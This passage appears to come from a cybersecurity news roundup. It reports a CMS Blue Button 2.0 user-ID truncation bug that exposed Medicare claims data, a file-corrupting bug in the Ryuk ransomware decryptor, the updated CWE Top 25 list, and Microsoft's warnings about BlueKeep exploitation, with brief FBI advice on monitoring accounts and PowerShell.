The FBI additionally recommends the audit of new accounts created and monitoring the Active Directory for modifications to approved users; permitting PowerShell logging and monitoring odd commands, which include executing Base64 encoded PowerShell; and making sure that only the most recent version of PowerShell is set up.

The Centers for Medicare and Medicaid Services (CMS) found a bug in its Blue Button 2.0 API which compromised the protected health information (PHI) of 10,000 beneficiaries of Medicare. Because of this, CMS temporarily suspended access to the Blue Button API while the investigation and extensive code review are ongoing. It is not yet certain when is the resumption of the Blue Button 2.0 service.

On December 4, 2019, a third-party application partner notified CMS about the data anomaly associated with the Blue Button API. The CMS affirmed the data issue and promptly halted access to the system affected while investigating the matter.

The CMS identified the anomaly caused by a coding bug, which potentially permitted data sharing with the wrong Blue Button 2.0 apps and the incorrect beneficiaries. The CMS confirmed that the bug affected 30 applications.

Medicare beneficiaries use the Blue Button platform to permit third-party apps, services, and research systems to gain access to their claims information. A CMS identity management system confirms user information by means of a randomly created unique user ID, which makes certain the sharing of the right beneficiary claims information with the right third-party apps.

The CMS identified a coding bug in the Blue Button 2.0, which truncates a 128-bit user ID to a 96-bit user ID, which lacks randomness. Therefore, a similar truncated user ID was issued to a number of beneficiaries. That further resulted in the passing of the claims data of beneficiaries having similar truncated user ID within the identity management system to other end users and programs through Blue Button 2.0.

It was perfectly clear what is the mistake and why it led to the impermissible disclosure of claims information. What was unclear at the beginning was how the introduction of the bug happened and why it was not immediately identified to avoid the compromise of sensitive beneficiary information.

There are three points to note from the preliminary investigation findings associated with testing, code reviews, and cross-team collaboration.

According to the findings of the CMS investigation, the bug was brought in on January 11, 2018. When there are changes introduced, there is normally a thorough review of the modifications, however, in January there was no comprehensive review. If there was a review, CMS probably identified the bug and fixed it before the disclosure of any sensitive data.

The CMS checks Blue Button 2.0 employing synthetic information to confirm functionality. This makes certain that no PHI is at stake. Incorporating Blue Button 2.0 with other systems was not examined so as to safeguard PHI. As a result, there was no testing done when it was incorporated into the identity management system.

The CMS remarks that a separate identity management team operates the code that creates the user ID token. The Blue Button 2.0 team assumed that the token worked well, and did not validate it. If the enterprise teams had better collaboration, both had the required information when making decisions.

CMS already took the steps to stop more errors later on. A better check and validation process is now in place and the Blue Button 2.0 team is going to do thorough checks of all new code to make sure to identify coding errors and correct them prior to making the code changes live. The Blue Button 2.0 will now keep complete user IDs and not truncated IDs.

A complete platform review is currently being done and the API will stay temporarily suspended until the completed coding review.

CMS will also conduct a detailed analysis to find out the possible impact on beneficiaries and make decisions about the other necessary steps to safeguard impacted beneficiaries, for instance offering credit monitoring services.

Cybersecurity company Emsisoft issued an alert regarding a recently identified decryptor bug utilized by victims of the Ryuk ransomware to retrieve their data. A bug in the decryptor app could result in the corruption of a number of files and permanent loss of data.

Ryuk ransomware is a very active variant of ransomware. Many use it in attacking healthcare companies in the U.S.A, which include Alabama-based DCH Health System and the IT service provider known as Virtual Care Provider.

Ryuk ransomware is deployed in the following different ways:

• conducting scans to determine open Remote Desktop Protocol ports
• conducting brute force attacks on RDP
• downloading ransomware through unpatched vulnerabilities
• installing the Ryuk ransomware as a secondary payload by Trojans like TrickBot

Decryptor for the Ryuk ransomware is not free, hence, recovery will depend on whether the company has viable backups, if not victims have no choice but to pay a big ransom to get the decryptor keys.

After paying the ransom, Ryuk ransomware victims get a decryptor app including the keys for file decryption. Nonetheless, all files will not be recovered using the decryptor app. Big files may be corrupted in the course of the decryption process.

This is because the encryption process changed recently. Ryuk ransomware does not encrypt the whole file when the file is over 54.4 megabytes. This change was meant to accelerate the encryption process so that the attack won’t be noticed prior to the completion of file encryption.

Because of the bug, there is a miscalculation of the footer in large files. The decryptor would truncate big files and the last byte will be lost. This isn’t an issue for a lot of file types that only have padding in the last byte and no data. But a few file types use the last type, for instance, Oracle database files and virtual disk files (VHD/VHDX). Losing that last byte in these file types results in corrupted files that cannot be recovered.

In addition, the original encrypted file is erased when the decryptor identifies the file as successfully decrypted, when in fact the decryption has caused file corruption. This means that when the decryptor is in operation, corrupted files cannot be recovered.

Before decryption, it is very important to duplicate all encrypted files. Sometimes, decryptors do not work as desired leading to loss of some files. If there are copies of the encrypted files, when the decryption process fails, one can try again. Emsisoft could help victims retrieve their encrypted files by creating a decryptor for the Ryuk ransomware without the bug. Because of the work input by its engineers, those who need this bug-free decryptor must pay for it.

The U.S. Department of Homeland Security’s Homeland Security Systems Engineering and Development Institute (HSSEDI) has released an up-to-date list of the 25 most dangerous software vulnerabilities. It’s been 8 years since the list was updated.

The creation of the Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Vulnerabilities was in 2011. This important list serves as a tool to improve cybersecurity resiliency and is useful to software developers, security researchers, testers, clients, and educators because it offers insights into the most common and dangerous security threats in the software market.

Analysts that initially compiled the list used a subjective technique, such as interviewing security researchers and surveying industry experts, to assess vulnerabilities. HSSEDI, under the management of MITRE, employed another approach based on real-world vulnerabilities that the security researchers reported to assess vulnerabilities. This method gives a more steady and repeatable analysis that shows the problems seen in the real world.

The National Vulnerability Database described 25,000 typical software vulnerabilities and problems in the last two years, which were evaluated and ranked. The new strategy takes into account the occurrence of vulnerabilities, their seriousness, likely damages, and the probability of exploiting the vulnerabilities. Although there are a lot of vulnerabilities, those that have a low impact or are hardly exploited were omitted from the list.

Before the update, on top of the list is Improper Neutralization of Special Elements used in an SQL Command (SQL injection). In the revised list, this vulnerability is only the top 6. The switch in position doesn’t mean the severity of SQL injection changed since it continues to have the highest severity score of 9.129. The total score is 24.54 of 10, because of other factors like occurrence and regularity of exploitation.

On number one position now is the Improper Restriction of Operations within the Bounds of a Memory Buffer (CWE-119), with a score of 75.56/100 and a severity score of 8.045/10. This is the location in the software that executes operations on a memory buffer however could read or write to memory external of that memory buffer. That could permit operations to be carried out on memory locations which are linked to other variables, information structures, or internal program information that could result in the remote execution of arbitrary code, modification of data flow, or system failures.

On number two position is the Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting – CWE-79). The vulnerability score of 5.778/10 is relatively low severity, however, its total score was 45.69 / 100 because of the high chances of exploitation, its occurrence in reports, and exploitation enabling attackers to execute unauthorized code.

On number three is Improper Input Validation (CWE-20). This has an overall score of 43.61/100. It has a high score because of the high chances of exploitation and possible harm. This vulnerability’s severity score is 7.242/10 and could be exploited to result in the execution of unauthorized code, denial of service attacks, and reading or alteration of memory.

See the updated list on MITRE’s website.

Microsoft gave another warning regarding the patching of the BlueKeep vulnerability (CVE-2019-0708). This vulnerability demanded prompt patching since October 23 when the mass attack exploited this flaw.

The attack was initially discovered on November 2, along with its delay because of the inability of the attacker to fully exploit the vulnerability. The campaign seems to have originated from a threat actor with a low-level skill who intended to exploit the vulnerability to install cryptocurrency mining malware. Microsoft has released yet another alert to expect the worse.

The first attempt of mass exploitation received a lot of attention in the news, but it doesn’t seem to have had a great impact on the urgency of patching. SANS Institute conducted a scan, which showed that the rate of patching did not really change after the attacks. Though the number of unpatched devices steadily declined since the release of the patch by Microsoft in May, still a huge number of devices remain vulnerable to BlueKeep attack.

Though the attack was on a big scale, the success was minimal. The exploit used did not work correctly and the machines simply crashed in most instances. If a skilled threat actor successfully exploited the vulnerability, it’s possible to link a vulnerable device through RDP services without any user interaction necessary. Codes could be executed on unsecured computers, so that the attacker could access, change, and steal information, download malware, and kick off attacks on other unpatched devices linked to the network, including those that aren’t exposed online.

In 2017, security researcher Marcus Hutchins found and initialized a ‘kill switch’ to control the damage that the WannaCry ransomware can cause. Now, he is giving a warning that a ransomware attack can cause a major disruption even without a worm since a large number of vulnerable gadgets are servers.

Microsoft has cautioned that while the BlueKeep attacks are not prevented, other a lot more threatening exploit can be created and employed in a huge attack on vulnerable gadgets. Microsoft is telling customers to determine and upgrade all vulnerable systems right away.